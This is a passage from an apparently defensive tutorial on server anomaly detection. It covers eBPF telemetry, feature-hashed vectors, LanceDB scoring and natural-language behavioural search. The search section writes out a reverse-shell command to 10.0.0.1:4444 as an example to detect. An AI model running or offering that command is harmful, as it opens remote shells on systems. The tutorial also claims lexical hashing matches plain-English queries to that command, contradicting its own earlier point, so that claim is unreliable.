[0; 128],
timestamp_ns: bpf_ktime_get_ns(),
};
if let Ok(comm) = bpf_get_current_comm() {
snapshot.comm = comm;
}
// Read cmdline from userspace memory safely
let _ = bpf_probe_read_user_str(&mut snapshot.cmdline, ctx.arg(1));
emit_to_ringbuf(&snapshot);
0
}
**Architecture Rationale:** eBPF requires kernel β₯ 5.8 with BTF (BPF Type Format) enabled for zero-instrumentation deployment. For legacy environments, the agent falls back to polling `/proc/[pid]/cmdline` and `/proc/[pid]/status` at fixed intervals. This dual-path design ensures telemetry continuity without sacrificing accuracy on modern kernels.
### Step 2: Deterministic Vector Representation
Raw process telemetry cannot be compared directly. We convert each execution event into a fixed-length numerical vector using feature hashing. This technique tokenizes structured fields, hashes each token to a vector index, and accumulates signed contributions. The result is normalized to unit length, enabling cosine distance calculations.
```typescript
// vectorizer.ts
import { createHash } from 'crypto';
interface TelemetryEvent {
processName: string;
parentName: string;
uid: number;
localPort?: number;
remotePort?: number;
cmdline: string;
}
function tokenize(input: string): string[] {
return input
.toLowerCase()
.split(/[\s/=\-_.]+/)
.filter(t => t.length > 1);
}
function computeBehaviorVector(event: TelemetryEvent): Float32Array {
const DIMENSIONS = 128;
const vec = new Float32Array(DIMENSIONS);
const tokens = [
event.processName,
event.parentName,
String(event.uid),
String(event.localPort ?? 0),
String(event.remotePort ?? 0),
...tokenize(event.cmdline)
];
for (let i = 0; i < tokens.length; i++) {
const token = tokens[i].trim();
if (!token) continue;
const hash = createHash('md5').update(`${token}:${i}`).digest();
const idx = hash[0] % DIMENSIONS;
const sign = (hash[1] & 1) ? 1 : -1;
vec[idx] += sign;
}
// L2 normalization
let magnitude = 0;
for (let i = 0; i < DIMENSIONS; i++) magnitude += vec[i] ** 2;
magnitude = Math.sqrt(magnitude) || 1;
for (let i = 0; i < DIMENSIONS; i++) vec[i] /= magnitude;
return vec;
}
Why Feature Hashing Over Neural Embeddings?
Neural models like all-MiniLM-L6-v2 (384 dimensions, ~22 MB) or OpenAI's text-embedding-3-small provide richer semantic understanding. They recognize that sh and bash are related shells, or that /tmp and /dev/shm share similar risk profiles. However, at fleet scale, the operational cost becomes prohibitive. A 50-server environment generating ~3,000 events hourly requires either local model inference (adding 5β20 ms CPU latency and ~200 MB disk overhead per backend instance) or external API calls (introducing network latency, per-request costs, and single-point-of-failure risk).
Feature hashing executes in <0.1 ms, requires zero external dependencies, and produces deterministic outputs. The same command line always maps to the same vector, simplifying testing and debugging. The vectorization layer is intentionally isolated behind a single function. Swapping to a neural embedding model later requires only updating computeBehaviorVector(); downstream scoring and storage remain unaffected.
Step 3: Embedded Storage & Anomaly Scoring
Vectors are stored in LanceDB, an embedded vector database that runs in-process and persists to disk. Each workload receives an isolated table. New events are scored against historical neighbors before being appended to the baseline.
// behaviorEngine.ts
import { LanceDBClient, Table } from 'lancedb';
const SCORING_WINDOW = 10; // k-nearest neighbors
const PRUNE_DAYS = 7;
export async function evaluateAndLearn(
orgId: string,
workload: string,
event: TelemetryEvent
): Promise<number> {
const db = await LanceDBClient.connect('./data/lancedb');
const tableName = `${orgId}__${workload}`;
const table: Table = await db.openTable(tableName);
const vector = computeBehaviorVector(event);
// Query historical baseline
const neighbors = await table
.search(vector)
.limit(SCORING_WINDOW)
.toArray();
let anomalyScore = 1.0; // Default: completely unseen
if (neighbors.length > 0) {
const distances = neighbors.map(n => {
const storedVec = Array.from(n.vector);
return cosineDistance(vector, storedVec);
});
const minDistance = Math.min(...distances);
anomalyScore = Math.min(1.0, minDistance * 2.0);
}
// Persist to baseline
await table.add([{
vector,
ts: Date.now(),
pid: event.processName,
cmdline: event.cmdline
}]);
// Prune stale entries asynchronously
pruneOldEntries(table, PRUNE_DAYS);
return anomalyScore;
}
function cosineDistance(a: Float32Array, b: number[]): number {
let dot = 0, normA = 0, normB = 0;
for (let i = 0; i < a.length; i++) {
dot += a[i] * b[i];
normA += a[i] ** 2;
normB += b[i] ** 2;
}
return 1 - (dot / (Math.sqrt(normA) * Math.sqrt(normB) || 1));
}
Architecture Rationale: LanceDB eliminates the need for external vector infrastructure (Pinecone, Weaviate, Milvus). It supports approximate nearest-neighbor (ANN) search natively, scales to millions of vectors per table, and compacts data automatically. Anomaly scores range from 0 (highly familiar) to 1 (completely novel). Scores are forwarded to ClickHouse for long-term retention, aggregation, and alerting.
Step 4: Natural Language Behavioral Search
Because every process execution is represented as a vector, querying by intent becomes trivial. The same tokenization and hashing pipeline converts natural language descriptions into vectors. A nearest-neighbor search across workload tables returns execution patterns that semantically match the query, regardless of literal keyword matches.
// searchInterface.ts
export async function searchBehavioralPatterns(
query: string,
orgId: string
): Promise<Array<{ event: TelemetryEvent; score: number }>> {
const queryVector = computeBehaviorVector({
processName: query,
parentName: '',
uid: 0,
cmdline: query
} as TelemetryEvent);
const db = await LanceDBClient.connect('./data/lancedb');
const tables = await db.tableNames();
const results: any[] = [];
for (const name of tables.filter(t => t.startsWith(orgId))) {
const table = await db.openTable(name);
const hits = await table.search(queryVector).limit(5).toArray();
results.push(...hits);
}
return results.sort((a, b) => a._distance - b._distance);
}
A query like "reverse shell outbound connection" will match bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 because the token distribution overlaps significantly in vector space, even though the literal words differ.
Pitfall Guide
1. Ignoring Kernel Version Requirements
Explanation: eBPF tracepoint attachment requires kernel β₯ 5.8 with BTF enabled. Deploying the eBPF agent on older kernels causes silent failures or crashes.
Fix: Implement a runtime capability check. If BTF is unavailable, automatically switch to /proc polling mode and log a warning. Never assume kernel version matches OS release.
2. Vector Space Pollution from High-Cardinality Fields
Explanation: Including raw PIDs, timestamps, or ephemeral ports in the feature set creates sparse, non-reusable vectors. Two identical commands with different PIDs will appear unrelated.
Fix: Strip or normalize dynamic fields before hashing. Use static identifiers (process name, parent, UID, fixed ports) and discard monotonically increasing values.
3. Unbounded Vector Table Growth
Explanation: Appending every execution event indefinitely causes LanceDB tables to grow unmanageably, degrading ANN search performance and increasing disk usage.
Fix: Implement time-based pruning. Retain only the last 7 days of vectors per workload. Run compaction jobs during low-traffic windows to reclaim space.
4. Over-Reliance on Raw Command-Line Strings
Explanation: Command lines contain variable arguments, temporary file paths, and randomized flags. Hashing raw strings reduces similarity matching accuracy.
Fix: Tokenize and normalize paths. Replace /tmp/tmp.XYZ123 with /tmp/tmp.*, strip randomized query parameters, and collapse repeated flags before vectorization.
5. Missing Parent-Process Context
Explanation: A process like python3 script.py executed by cron behaves differently than when executed by an interactive shell. Ignoring parent context increases false positives.
Fix: Always include parentName in the feature set. Weight parent context higher in the hashing pipeline to distinguish automated vs. manual execution origins.
6. Blocking Ingestion on Vector Search
Explanation: Synchronous k-NN queries during high-throughput periods create backpressure, delaying telemetry delivery and causing ring buffer overflows.
Fix: Decouple ingestion from scoring. Write raw events to a message queue, process scoring asynchronously, and batch LanceDB writes. Use read replicas or in-memory caches for hot baselines.
7. Hardcoding Anomaly Thresholds
Explanation: A single threshold (e.g., 0.7) fails across environments. Production workloads require stricter detection, while development environments tolerate higher noise.
Fix: Make thresholds configurable per workload. Store threshold mappings in a centralized config service. Allow dynamic adjustment without agent restarts.
Production Bundle
Action Checklist
Decision Matrix
| Scenario | Recommended Approach | Why | Cost Impact |
|---|
| Fleet size < 50 servers, modern kernels | eBPF + Feature Hashing | Low overhead, deterministic, zero external dependencies | Minimal (CPU < 1%, storage ~50MB/server) |
| Fleet size > 200 servers, mixed kernels | /proc fallback + Feature Hashing | Ensures coverage across legacy systems without eBPF complexity | Moderate (higher polling overhead, ~2-3% CPU) |
| Need semantic search for plain-English queries | Swap to all-MiniLM-L6-v2 locally | Captures shell/path semantics, improves NL search accuracy | High (~200MB RAM/disk, 5-20ms latency per event) |
| Multi-tenant SaaS with strict isolation | External Vector DB (Milvus/Weaviate) | Better multi-tenancy, scaling, and access control | High (infrastructure cost, network latency) |
| On-prem air-gapped environment | LanceDB + Feature Hashing | Fully embedded, no external API calls, deterministic | Low (self-contained, no licensing) |
Configuration Template
# telemetry-agent-config.yaml
telemetry:
capture_mode: auto # auto | eBPF | proc
min_kernel_version: "5.8"
btf_required: true
batch_interval_seconds: 60
proc_poll_interval_ms: 5000
vectorization:
dimensions: 128
normalization: l2
tokenizer_pattern: "[\\s/=_\\-.]+"
strip_dynamic_fields: true
dynamic_field_regex: "\\b\\d{4,}\\b|tmp\\.[A-Za-z0-9]+"
scoring:
k_neighbors: 10
distance_metric: cosine
score_scale_factor: 2.0
default_threshold: 0.75
storage:
backend: lancedb
path: "./data/lancedb"
prune_after_days: 7
compaction_schedule: "0 3 * * 0"
output:
clickhouse_endpoint: "http://clickhouse:8123"
clickhouse_table: "security.behavioral_events"
partition_key: "date"
retry_policy:
max_attempts: 3
backoff_ms: 1000
Quick Start Guide
- Deploy the telemetry agent: Install the agent on target servers. The runtime automatically detects kernel capabilities and selects eBPF or
/proc mode.
- Initialize vector storage: Start the backend service. LanceDB creates per-workload tables on first event ingestion. No manual schema definition required.
- Configure thresholds: Set baseline anomaly thresholds per environment in the configuration file. Production workloads typically use 0.6β0.7; development uses 0.8β0.9.
- Verify baseline formation: Monitor ClickHouse for incoming
anomaly_score values. After 24β48 hours, familiar processes should stabilize near 0.0β0.1.
- Test behavioral search: Query the search interface with natural language descriptions. Validate that returned events match expected execution patterns without keyword dependency.